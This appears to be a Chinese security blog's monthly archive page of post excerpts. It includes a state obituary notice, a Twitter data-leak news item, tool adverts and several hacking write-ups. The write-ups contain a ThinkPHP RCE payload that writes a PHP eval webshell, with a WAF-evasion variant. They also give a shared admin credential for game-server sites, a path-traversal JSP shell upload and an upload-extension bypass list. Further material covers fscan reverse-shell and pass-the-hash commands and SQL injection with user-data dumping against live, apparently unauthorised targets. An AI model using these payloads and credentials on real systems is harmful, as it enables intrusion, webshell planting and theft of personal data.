网站首页 发表在 2022年11月 的所有文章

  • 告全党全军全国各族人民书

    中国共产党中央委员会中华人民共和国全国人民代表大会常务委员会中华人民共和国国务院中国人民政治协商会议全国委员会中国共产党和中华人民共和国中央军事委员会 告全党全军全国各族人民书 中国共产党中央委员会、中华人民共和国全国人民代表大会常务委员会、中华人民共和国国务院、中国人民政治协商会议全国委员会、中国共产党和中华人民共和国中央军事委员会,极其悲痛地向全党全军全国各族人民通告:我们敬爱的江泽民同志患白血病合并多脏器功能衰竭,抢救无效,于2022年11月30日12时13分在上海逝世,享年96岁。 江泽民同志是我党我军我国各族人民公认的享有崇高威望的卓越领导人,伟大的马克思主义者,伟大的无产阶级革命家、政治家、军事家、外交家,久经考验的共产主义战士,中国特色社会主义伟大事业的杰出领导者,党的第三代中央领导集体的核心,“三个代表”重要思想的主要创立者。 江泽民同志从青少年时代起就勤奋学习,追求真理,受到爱国主义思想和民主革命思想的启蒙。在大学学习期间,经过积极参加抗日爱国活动洗礼,江泽民同志形成了马克思主义世界观,完成了人生道路的选择,最终确立了为民族解放、人民幸福而奋斗的人生理想和信仰。一九四七年从上海交通大学毕业后,江泽民同志到工厂工作,在工人群众中并在青年会夜校职业青年中从事革命宣传工作,一九四九年组织工人群众开展护厂活动,迎接上海解放。 中华人民共和国成立初期,江泽民同志先后担任上海益民食品一厂第一副厂长、上海制皂厂第一副厂长、第一机械工业部上海第二设计分局电器专业科科长等职。一九五四年,国家在长春兴建第一汽车制造厂,需要大批专业技术干部和管理干部,江泽民同志应调前往,一九五五年赴苏联莫斯科斯大林汽车制造厂实习。一九五六年回国后,江泽民同志任长春第一汽车制造厂动力处副处长、副总动力师、动力分厂厂长。一九六二年,江泽民同志调任第一机械工业部上海电器科学研究所副所长,负责该所科研领导工作。一九六六年,江泽民同志调任武汉热工机械研究所所长、代理党委书记,后任党委书记,组织原子能发电设备设计工作。“文化大革命”开始后,江泽民同志受到冲击。一九七〇年,江泽民同志调到第一机械工业部工作,一九七一年任中国第一机械工业部派驻罗马尼亚专家组总组长,一九七三年回国先后任第一机械工业部外事局副局长、局长。一九八〇年,江泽民同志担任国家进出口管理委员会、国家外国投资管理委员会副主任兼秘书长、党组成员,主管实施广东、福建两省实行特殊政策、灵活措施和试办经济特区等开创性工作。一九八二年,江泽民同志任电子工业部第一副部长、党组副书记,一九八三年任部长、党组书记,为我国电子工业发展作出了重要贡献。一九八二年九月,江泽民同志在党的第十二次全国代表大会上当选为中央委员。 一九八五年,江泽民同志任上海市市长、中共上海市委副书记。一九八七年,江泽民同志在党的十三届一中全会上当选为中共中央政治局委员,并任中共上海市委书记。担任上海市长、市委书记期间,江泽民同志带领上海广大干部群众振奋精神、勇于探索,推动上海改革开放和社会主义现代化建设取得重大突破,浦东开发开放蓄势谋篇,推动党的建设、精神文明建设、社会建设取得重大进步。一九八九年春夏之交我国发生严重政治风波,江泽民同志拥护和执行党中央关于旗帜鲜明反对动乱、捍卫社会主义国家政权、维护人民根本利益的正确决策,紧紧依靠广大党员、干部、群众,有力维护上海稳定。 一九八九年,在党的十三届四中全会上,江泽民同志当选为中共中央政治局常委、中央委员会总书记。同年,党的十三届五中全会决定江泽民同志为中共中央军事委员会主席。一九九〇年,在七届全国人大三次会议上当选为中华人民共和国中央军事委员会主席。 江泽民同志是党的第三代中央领导集体的核心。二十世纪八十年代末九十年代初,国际国内发生严重政治风波,世界社会主义出现严重曲折,我国社会主义事业发展面临空前巨大的困难和压力。在这个决定党和国家前途命运的重大历史关头,江泽民同志带领党的中央领导集体,紧紧依靠全党全军全国各族人民,旗帜鲜明坚持四项基本原则,维护国家独立、尊严、安全、稳定,毫不动摇坚持经济建设这个中心,坚持改革开放,捍卫了中国特色社会主义伟大事业,打开了我国改革开放和社会主义现代化建设新局面。 从党的十三届四中全会到党的十六大的十三年中,国际形势风云变幻,我国改革开放和社会主义现代化建设进程波澜壮阔。在国际国内十分复杂的形势下,江泽民同志带领党的中央领导集体,高举马克思列宁主义、毛泽东思想、邓小平理论伟大旗帜,坚持党的基本路线不动摇,团结全党全国各族人民,抓住机遇、深化改革、扩大开放、促进发展、保持稳定,确立了社会主义市场经济体制的改革目标和基本框架,确立了社会主义初级阶段公有制为主体、多种所有制经济共同发展的基本经济制度和按劳分配为主体、多种分配方式并存的分配制度,制定和实施了促进改革发展稳定的一系列方针政策和重大战略,锐意推进经济体制改革、政治体制改革、文化体制改革和其他各方面改革,开创全面改革开放新局面,实施依法治国基本方略,坚持“和平统一、一国两制”的方针,实现香港、澳门顺利回归,坚持独立自主的和平外交政策,打开外交工作崭新局面,推进党的建设新的伟大工程,推动社会主义物质文明、政治文明、精神文明建设取得举世瞩目的新进展,成功把中国特色社会主义推向二十一世纪。在以江泽民同志为核心的党的第三代中央领导集体领导下,我们从容应对一系列关系我国主权和安全的国际突发事件,战胜在政治、经济领域和自然界出现的困难和风险,保证了改革开放和社会主义现代化建设的航船始终沿着正确方向破浪前进。党的十三届四中全会以来十三年我们党和国家取得的巨大成就,同江泽民同志作为马克思主义政治家的雄才大略、关键作用、高超政治领导艺术是分不开的。 江泽民同志担任中央军事委员会主席期间,深刻洞察和把握国内外形势的重大变化和世界新军事变革的发展趋势,对加强国防和军队现代化建设提出了一系列新论断新举措,丰富和发展了毛泽东军事思想和邓小平新时期军队建设思想,创立了江泽民国防和军队建设思想,领导国防和军队现代化建设取得了巨大成就。江泽民同志强调,要坚持国防建设与经济建设协调发展的方针,加强人民军队革命化、现代化、正规化建设;按照政治合格、军事过硬、作风优良、纪律严明、保障有力的总要求,紧紧围绕打得赢、不变质两个历史性课题,全面推进人民军队建设;毫不动摇坚持党对人民军队的绝对领导,始终把思想政治建设摆在我军各项建设的首位,永葆人民军队性质、本色、作风;贯彻积极防御的军事战略方针,推进中国特色军事变革,按照建设信息化军队、打赢信息化战争的目标,坚定不移走中国特色的精兵之路,实现我军现代化跨越式发展;实施科技强军战略,坚持从严治军、依法治军、勤俭建军,探索新的历史条件下治军的特点和规律,与时俱进推进我军各项建设;深化国防科技工业体制改革,增强自主创新能力,加快国防科技和武器装备发展,走出一条投入较少、效益较高的军队现代化建设路子;按照平战结合、军民结合、寓军于民的方针,提高国防动员能力,发展高技术条件下人民战争的战略战术,巩固军政军民团结。这一切,对于加强国防和军队现代化建设具有长远指导意义。 江泽民同志坚持马克思主义的思想路线,尊重实践,尊重群众,准确把握时代特征,科学判断我们党所处的历史方位,围绕建设中国特色社会主义这个主题,在改革发展稳定、内政外交国防、治党治国治军等各方面都提出了一系列新思想新观点新论断,为坚持和发展党的基本理论、基本路线、基本纲领、基本经验作出了杰出贡献。特别是他集中全党智慧创立了“三个代表”重要思想,实现了党在指导思想上的又一次与时俱进,体现了一位真正马克思主义者的巨大政治勇气和理论勇气。“三个代表”重要思想突出强调我们党始终代表中国先进生产力的发展要求、代表中国先进文化的前进方向、代表中国最广大人民的根本利益,遵循了人类历史发展进步的普遍规律,顺应了时代发展潮流和我国社会发展进步要求,反映了全国各族人民利益和愿望,抓住了新形势下提高党的执政能力、巩固党的执政地位、完成党的执政使命的根本。“三个代表”重要思想最鲜明的特点和最突出的贡献,在于用一系列紧密联系、相互贯通的新思想新观点新论断,进一步回答了什么是社会主义、怎样建设社会主义的问题,创造性回答了建设什么样的党、怎样建设党的问题,是对马克思列宁主义、毛泽东思想、邓小平理论的继承和发展,深化了我们对新的时代条件下推进中国特色社会主义事业、加强党的建设的规律的认识。 江泽民同志高度重视事关党和人民事业的重大战略问题。在筹备党的十六大期间,江泽民同志主动提出,为了党和国家事业长远发展,为了党和国家长治久安,他不再担任中央领导职务,并从中央委员会退下来,以利于促进党和国家高层领导新老交替。党中央同意了江泽民同志的请求。从当时国际形势复杂多变、国防和军队建设任务繁重考虑,党的十六届一中全会决定江泽民同志留任中共中央军事委员会主席。党的十六届一中全会后,江泽民同志全力支持以胡锦涛同志为总书记的新一届中央领导集体的工作,尽心尽力履行党中央交付他的职责。二〇〇四年,江泽民同志从党和国家事业长远发展的大局出发,又主动提出辞去他担任的党和国家中央军事委员会主席的职务,充分体现了他对党和国家事业发展的深谋远虑。 从领导岗位上退下来以后,江泽民同志坚决拥护和支持党中央工作,关心中国特色社会主义伟大事业,坚定支持党风廉政建设和反腐败斗争。二〇〇六年,江泽民同志亲自主持编辑和逐篇审定《江泽民文选》第一卷、第二卷、第三卷。《江泽民文选》主要收入了江泽民同志从二十世纪八十年代末至二十一世纪初具有代表性和独创性的重要著作,为我们更深入地学习领会“三个代表”重要思想,继续推进中国特色社会主义伟大事业和党的建设新的伟大工程提供了重要教材。 江泽民同志目光远大、审时度势,总是从中国和世界发展大势、从党和国家工作全局出发观察和思考问题,不断推进理论创新和其他各方面创新。江泽民同志信念坚定、处事果断,总是把党和人民放在心中最高的位置,始终不渝坚持共产党人的理想信念,在关键时刻具有作出果敢决策的非凡胆略和进行理论创新的巨大勇气。江泽民同志尊重实践、与时俱进,总是紧紧把握时代发展脉搏和契机,坚持从党和人民活生生的实践出发总结经验、寻找路子,脚踏实地而又开拓进取推进党和国家各项工作。江泽民同志尊重群众、关心群众,总是高度关注人民群众安危冷暖,依据最广大人民根本利益来检验和推动工作。江泽民同志的优秀品格和高尚风范将永远教育和激励我们前进。 江泽民同志的逝世,对我党我军我国各族人民是不可估量的损失。党中央号召,全党全军全国各族人民化悲痛为力量,继承江泽民同志的遗志,以实际行动表达我们的悼念。 我们一定要更加自觉地团结在以习近平同志为核心的党中央周围,坚持党的基本理论、基本路线、基本方略,深刻领悟“两个确立”的决定性意义,增强“四个意识”、坚定“四个自信”、做到“两个维护”,持之以恒推进全面从严治党,深入推进新时代党的建设新的伟大工程,以党的自我革命引领社会革命,使我们党坚守初心使命,始终成为中国特色社会主义事业的坚强领导核心。 我们一定要坚持马克思列宁主义、毛泽东思想、邓小平理论、“三个代表”重要思想、科学发展观,全面贯彻习近平新时代中国特色社会主义思想,坚持把马克思主义基本原理同中国具体实际相结合、同中华优秀传统文化相结合,坚持解放思想、实事求是、与时俱进、求真务实,勇于进行理论探索和创新,在新时代的伟大实践中不断开辟马克思主义中国化时代化新境界,让当代中国马克思主义放射出更加灿烂的真理光芒。 我们一定要坚定不移坚持中国共产党领导、坚持中国特色社会主义,坚持把国家和民族发展放在自己力量的基点上、把中国发展进步的命运牢牢掌握在自己手中,团结一心为全面建成社会主义现代化强国、实现第二个百年奋斗目标而努力,以中国式现代化全面推进中华民族伟大复兴,推动构建人类命运共同体,创造人类文明新形态。 我们一定要坚持全心全意为人民服务的根本宗旨,树牢群众观点,贯彻群众路线,尊重人民首创精神,坚持一切为了人民、一切依靠人民,从群众中来、到群众中去,始终保持同人民群众的血肉联系,始终同人民同呼吸、共命运、心连心。 我们一定要努力学习“三个代表”重要思想,学习江泽民同志的革命精神和革命风范,学习他运用马克思主义立场、观点、方法研究新情况、解决新问题的科学态度和创造精神,为把我国建设成为富强民主文明和谐美丽的社会主义现代化强国而团结奋斗。 中华民族的伟大复兴事业,凝结了包括江泽民同志在内的一代又一代共产党人的心血和奋斗。前进道路上,全党全军全国各族人民要在以习近平同志为核心的党中央坚强领导下,高举中国特色社会主义伟大旗帜,全面贯彻习近平新时代中国特色社会主义思想,弘扬伟大建党精神,坚定信心、同心同德,埋头苦干、奋勇前进,为全面建设社会主义现代化国家、全面推进中华民族伟大复兴而团结奋斗。 江泽民同志永垂不朽! ...

    2022-11-30 值得一看 55
  • 难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开

    就在马斯克宣布裁撤整个安全部门之后,Twitter再次传来一个重磅消息,超过540万条用户数据已经在暗网公开,并且免费共享给所有人。此外,安全人员还披露了另外一个可能泄露的,规模更大的数据库,其中包含了上千万条Twitter数据。 这些数据包含了大多数的公共信息,包括包括帐户的 Twitter ID、名称、屏幕名称、已验证状态、位置、URL、描述、关注者数量、帐户创建日期、好友数量、收藏夹数量、状态计数和个人资料图像 URL;以及较为私密的用户的电子邮件和电话号码等信息。一旦这些信息在暗网爆发开来,那么意味着数百万的Twitter用户将有可能面临潜在的网络钓鱼攻击。   数据泄露6个月后才修复漏洞   根据国外媒体报道,2022年8月5日,Twitter在其隐私中心发布声明,确认此前被曝出的540万个账户信息泄露事件确实存在。 Twitter表示,之所以直接发布这一声明,是因为无法确认每一个可能受到影响的账户,因此无法单独向账户发送信息泄露警告。“拥有匿名账户的人需要尤其注意,他们可能会被政府或其他人锁定目标。”Twitter在声明中强调。 被黑客利用的漏洞是Twitter 在2021年6月更新时引入的:如果有人向Twitter系统提交一个电子邮件地址或电话号码,Twitter系统会回复相关联的账户信息。 2022年1月1日,网络安全平台Hackerone用户zhirinovsky报告了这一漏洞,并在Twitter的漏洞奖励计划中获得5040美元的奖励。根据报告,该漏洞对拥有私人或匿名账户的用户构成了“严重威胁”,可能被用来“创建数据库”,或通过大数据分析出Twitter的用户画像。 得知此事后,Twitter立即进行了调查和修复。当时没有证据表明有人利用了这个漏洞,然而这已是漏洞被引入代码库的6个月之后。Twitter并未在隐私中心对此发表任何说明。 7月21日,媒体RestorePrivacy注意到一位新用户在黑客论坛上以3万美元出售Twitter数据库,称涉及540万用户,包括“从名人到公司”的用户数据。RestorePrivacy验证发现,受害者来自世界各地,这些被泄露的数据包括与Twitter账号绑定的电子邮件、电话号码、公开的个人资料信息,并可以与真实的人相匹配。 这已经不是Twitter第一次发生大规模数据泄露事件,2019年1月,Twitter披露了其修复的一个安全漏洞,而在此前四年多的时间里,该漏洞使得许多用户的私人推文被泄露。而此次数据泄露也是漏洞引起,并且经过长达六个月的时间才修复完成。 难怪马斯克一上任就裁掉了Twitter整个安全部门,作为全球大型社交平台之一,其安全能力属实无法令人满意。 数据泄露的远比想象中的多 但更糟糕的消息还在后面,免费共享540 万条用户数据的发布者称,这仅仅是Twitter数据泄露的一部分,他们还窃取了更多的用户数据。据悉这些泄露的Twitter数据已经达到千万级,其中包括使用相同 API 错误收集的个人电话号码,以及公共信息,包括已验证状态、帐户名、Twitter ID、个人简介和屏幕名称。 Loder 最早在Twitter上发布了上述更大数据泄露的消息,发帖后不久他就被停职。Loder随后在Mastodon上发布了这个更大规模数据泄露的编辑样本 。 Loder分享更大漏洞的消息 有安全专家通过这个未知的数据库的样本文件,对其中信息的真实性进行了核实。结果发现,包括电话号码在内的信息全部都真实有效,这也从侧面证明了此次千万级数据泄露是真实存在的。 此外,这些用于核实的信息都没有出现在 8 月份出售的原始数据中,这说明 Twitter 的数据泄露比之前披露的要严重得多,而且攻击者之间流传着大量的用户数据。 安全专家Pompompurin表示,目前不知道是谁创建了这个新发现的数据转储,表明其他人正在利用这个 API 漏洞。这个新发现的数据转储由许多按国家和地区代码分解的文件组成,包括欧洲、以色列和美国。 有消息称这个泄露的数据库存储的信息量有可能达到2千万条,其泄漏量之大令人震惊,因此Twitter用户应提高警惕,仔细检查任何声称来自Twitter的电子邮件,避免陷入网络钓鱼攻击的陷进之中。 ...

    2022-11-30 值得一看 72
  • 斗象DayBreak自动化渗透测试工具

    斗象DayBreak自动化渗透测试工具 核心特性: 1.实战化: 依托漏洞盒子10W+白帽多年沉淀下来的攻防经验,从实战出发,以专业视角将经验转化为产品能力 2.轻量化: 通过非常轻量级地方式安装软探针,即用即走可无限拓展,保障有效性的同时更加方便快捷 3.自动化: 内置多个扫描引擎,周期化、自动化、可持续性地执行任务,实现全场景、全时段、模拟攻击评估 4.社区化: 鼓励企业安全部门像“黑客”一样思考和行动,打造开放包容,人人都是“开发者”的社区精神 支持多平台(win, linux, macos) 下载 DayBreak: 前往https://daybreak.tophant.com/ 进行下载 首次打开会进入激活页面,需要前往 https://daybreak.tophant.com/ 填写QQ邮箱申请 ...

    2022-11-28 实用工具 56
  • 2022HVV POC合集

    =================================== 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。 0x01 工具介绍 泛微云桥e-Bridge存在SQL注入漏洞 2022/7/11 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11894 Apache Commons远程代码执行漏洞(CVE-2022-33980) 2022/7/7 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-10567 GitLab远程代码执行漏洞(CVE-2022-2185) 2022/7/1 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-10296 泛微OA存在SQL注入漏洞(CNVD-2022-43843) 2022/6/30 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-43843 通达OA存在代码执行漏洞 2020/8/20 历史真实漏洞 https://mp.weixin.qq.com/s/II1s-xwn4lD5_couvadI9g 用友U8-OA企业版存在SQL注入漏洞(CNVD-2022-31182) 2022/4/30 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-31182 泛微OA存在命令执行漏洞(CNVD-2022-06870) 2022/2/13 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-06870 FastJson代码执行漏洞 无已知公开的与情报对应的新近漏洞 致远A8 getshell 2019/6/26 历史真实漏洞 https://cn-sec.com/archives/1101195.html 禅道存在SQL注入漏洞(CNVD-2022-42853) 新近真实漏洞 FastJson代码执行漏洞 (CVE-2022-25845) 2022/5/23 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-7654 万户OA getshell 历史真实漏洞 http://cn-sec.com/archives/75986.html 蓝凌OA远程代码执行漏洞 2021/4/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-13023 拓尔思mas5 getshell 2022/4/28 新近真实漏洞 https://www.little2pig.work/archives/trs-mas http://cn-sec.com/archives/960259.html thinkphp远程代码执行漏洞 2018/12/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11895 jboss EAP /AS 6.远程代码执行 2019/12/11 历史真实漏洞 https://packetstormsecurity.com/files/167730/JBOSS-EAP-AS-6.x-Remote-Code-Execution.html https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf thinkphp任意文件读取 2018/12/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11895 明御Web应用防火墙任意登录 2022/7/24 历史真实漏洞,安恒已辟谣存在新近漏洞 http://cn-sec.com/archives/1196646.html Laravel存在命令执行漏洞(CNVD-2022-44351) 2022/6/7 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-8513 安恒web应用防火墙远程命令执行漏洞 2022/7/24 历史真实漏洞,安恒已辟谣存在新近漏洞 https://mp.weixin.qq.com/s/VdCjgxDL9qoAWIax5G3e0g http://cn-sec.com/archives/1196646.html 某软sdp软件定义边界系统命令执行漏洞 无已知公开的与情报对应的新近漏洞 某软网络准入控制系统反序列化漏洞 无已知公开的与情报对应的新近漏洞 某某服VPN存在远程缓冲区溢出漏洞(非web端口) 无已知公开的与情报对应的新近漏洞,深信服已辟谣,历史相关的漏洞见相关链接 https://security.sangfor.com.cn/index.php?m=&c=page&a=view&id=19 https://security.sangfor.com.cn/index.php?m=&c=page&a=view&id=18 某盟NF防火墙版本<6.0.3.198存在远程命令执行漏洞 无已知公开的与情报对应的新近漏洞 qax天擎版本<6.7.0.4910存在安全漏洞 无已知公开的与情报对应的新近漏洞 通达 OA 后台 SQL 注入漏洞 2022/7/25 新近真实漏洞 https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ 通达 OA 后台文件上传漏洞 2022/7/25 新近真实漏洞 https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ 华天动力OA前台任意文件上传漏洞 2022/7/25 存在性未确认,且大概率不影响最新版本 启明星辰天玥网络安全审计系统SQL注入0day 2021/7/15 历史真实漏洞 https://woj.app/7183.html uniview监控设备oday 2018/2/7 历史真实漏洞 https://vulners.com/zdt/1337DAY-ID-29739 蓝凌OA授权RCE和未授权RCE 2022/7/12 新近真实漏洞 https://mp.weixin.qq.com/s/zV4h5d9DrI7Nm49suSzIWw PHP 8.1.0-dev RCE 2021/5/23 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-27111 泛微Office 10 SQL注入漏洞 2021/8/13 历史真实漏洞 https://www.buaq.net/go-86552.html org.webjars:dojo 包 <1.17.2 多个漏洞 2021/7/31 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-3594 锐捷网络设备多个存在逻辑漏洞,可绕过身份验证登录多个系统 2022/6/21 新近真实漏洞 疑似用友NC 0day 2021/11/15 历史真实漏洞 https://www.cnsrc.org.cn/hw/1911.html https://decoded.avast.io/janneduchal/analysis-of-attack-against-national-games-of-china-systems/ Coremail Air邮件客户端附件后缀名显示不正确 2022/7/26 新近真实漏洞,厂商已确认 https://community.icoremail.net/article/460?bsh_bid=5789296111 泛微 V9 文件上传漏洞 2022/7/26 存在性未确认 小鱼易连疑似0day 2022/7/26 存在性未确认 泛微 E-office 文件包含漏洞(CNVD-2022-43247) 2022/6/8 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11900 泛微 E-office SQL 注入漏洞(CNVD-2022-43246) 2022/6/8 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11899 禅道 v16.5 SQL注入漏洞 2022/7/25 新近真实漏洞 https://github.com/z92g/ZentaoSqli 0x02 项目链接下载 添加下方QQ群...

    2022-11-26 实用工具 69
  • phpems7.0代码执行漏洞

    前言 今天拿到一篇某前辈发的代码审计文章,就复盘了一下,目前暂时没看到升级版,或者是补丁,目前也处 于0day状态 参考文章https://mp.weixin.qq.com/s/DD0lJD_COKLzF-HBPYvIwQ 环境搭建 本机环境: apeche2.4.39 ftp0.9.60 mysql5.7.26 代码审计分析 app/content/cls/api.cls.php 此处可以看到当blocktype==4的时候执行以下代码 可以看到eval中存在变量$tp 发现其调用函数fetchContent 全文追踪此函数 /lib/tpl.cls.php 进一步追踪compileContentTpl函数 对其中函数进行全部追踪发现再此处仅仅只是做了无关紧要的正则过滤并不影响我们的输入与输出 回到位置继续追踪$tp的值: html_entity_decode函数的作用将html实体编码的值转化为字符 追踪stripSlashes函数方法: lib/ev.cls.php 发现此处操作为将sql注入的转义的/去除 且此处发现blocktype的值 分析此段代码得结论,那么就是需要控制blocktype的值为4和blockcontent的值为我们想要使用的php 代码那么就可以造成代码执行漏洞 /app/content/cls/api.cls.php 看到产生漏洞的函数方法parseBlock 可以看出函数中blocktype的值由getBlockById($blockid)此处控制 定位此函数方法的函数 /app/content/cls/block.cls.php 根据框架预先定义好的数据库查询方法可以得知此处为数据库增加查询语句,查询blockid表中的数据查 询条件为$blockid值, 函数eval在传入$tp值并没有加入有效的过滤,那么此处只要我们可以控制数据表中的内容和blocktype 的值,并且可以控制传参那么此代码执行就生效 根据上诉代码可以得到存在调用/app/content/cls/block.cls.php getBlockById方法就可能存在代码执行 漏洞 /app/content/controller/blocks.master.php 此处modify方法调用getBlockById get指的是通过get方法获取,stripSlashes对$block['blockcontent']进行了html实体化,和sql注入的过 滤 由于再我们发现漏洞处的位置,代码对传入的值进行去html和删除转义字符的处理从而导致漏洞的存在 ...

    2022-11-25 未分类 58
  • 私服通用0Day复现getshell

    看了个私服站,网上搜下漏洞,还真有day,但是没有写getshell方法,我复现看看吧 后台地址:http://url/admin 一个通用的万能账号弱口令: 账号是 lu123 密码 cui123 利用day成功进入后台 传个图片马,然后有个数据库,直接备份数据库,getshell到手 ...

    2022-11-24 技术教程 53
  • Web漏洞扫描器 -- SZhe_Scan

    0x01 工具介绍 碎遮SZhe_Scan Web漏洞扫描器,基于python Flask框架,对输入的域名/IP进行全面的信息搜集,漏洞扫描,可自主添加POC。 0x02 安装与使用 1、安装 git clone https://github.com/Cl0udG0d/SZhe_Scancd SZhe_Scandocker-compose up -d 2、使用方法 访问ip:8000 即可,默认账户密码为:admin@admin.com / admin选择需要的POC和插件,添加任务进行扫描即可 0x03 项目链接下载 加入下方交流群...

    2022-11-23 技术教程 42
  • 可控文件拿shell

    挖洞的时候遇到一个平台 爆破进入后台 下一步肯定是找上传点然后拿shell是吧 确定上传 java站,改成jsp后缀试试 好,可以发现并不是filename控制文件后缀 那估计是str控制了 访问 http:/XXX.XXX/wb/upload/7D4B487AFAC49B42E472A8AB1D60D702.jsp 直接下载。。(一般遇到这种情况就放弃了) 再观察一下请求包 是不是能控制文件名 果然可以,能控制文件名是不是就可以跨目录了 http://xxx.xxx/wb/upload/../../test.jsp 等于http://xxx.xxx/test.jsp 尝试连接 直接administrator权限 ...

    2022-11-21 技术教程 35
  • 抽奖诈骗网站的渗透

    网站是这样的,他是利用短视频发布免费皮肤领取的视频,扫码进入这个网页,然后扫码进群再进行诈骗。 报错判断为think PHP框架 试试RCE POST: http://xxxx.xxxx.com/?s=index/index/ s=-1&_method=__construct&method=get&filter[]=phpinfo 为php5,尝试写shell POST http://xxx.xxx.com/?s=index/index s=file_put_contents('1.php','<?php eval($_POST[x])?>')&_method=__construct&method=POST&filter[]=assert 宝塔waf 经过多次实验,宝塔应该是拦截了_POST[关键字,下面我们尝试绕过 在php里面我们可以使用'.'拼接符来连接前后的语句 <?php ev'.'al($_PO'.'ST[x])?>相当于<?php eval($_POST[x])?> POST: http://xxx.xxx.com/?s=index/index s=file_put_contents('1.php','<?php ev'.'al($_PO'.'ST[x])?>')&_method=__construct&method=POST&filter[]=assert 写shell成功 访问http://xxx.xx/1.php 菜刀连接成功 宝塔限制的太死了,提权不了 ...

    2022-11-21 技术教程 53
  • 文件上传漏洞 部分解析后缀

    文件上传漏洞部分解析后缀 asp/aspx: asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr php: php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml jsp: jsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml ...

    2022-11-21 实用工具 39
  • 内网综合扫描工具 -- fscan

    ================================== 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。 0x01 工具介绍 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 0x02 安装与使用 fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)fscan.exe -hf ip.txt (以文件导入)fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx(wmiexec无回显命令执行) 0x03 项目链接下载 1.加巅峰阁QQ群,群文件下载 ...

    2022-11-21 实用工具 45
  • 对一次色情站点的渗透测试(苹果CMS)

    在某聊天软件学习技术看到有人卖色情站源码,自称苹果CMS三开,呢我肯定要看看,为后续打击违规站点做功课 现来看看代理后台 后台无可利用点,TP框架试着用TP工具扫了一下并无发现漏洞 这个代理后台渗透无望,尝试信息收集,在找了8页后找到了个激活码页面,应该是给下线激活域名的 看到这个查询框,果断burp,仍sqlmap跑一下 运气比较好,存在sql注入漏洞 那么现在就比较简单了,典型的苹果cms表前缀 那么问题来了,如何找到他后台,后台输入admin.php,admin 均为页面不存在 那只好利用我的社工手段了(忽悠大法) ok,后台地址到手,利用SQL注入跑出密码,成功登录后台 后台是苹果10cms,网上看了getshell方法,模板什么的,均无果。 总结: 注册用户信息6千多 代理273个 包括代理登录日志,管理日志已经全脱出来了。 奉劝各位,请勿跨越法律红线。...

    2022-11-20 技术教程 70
  • 响应“净网”专项行动,提高法律意识,自觉维护网络清朗环境

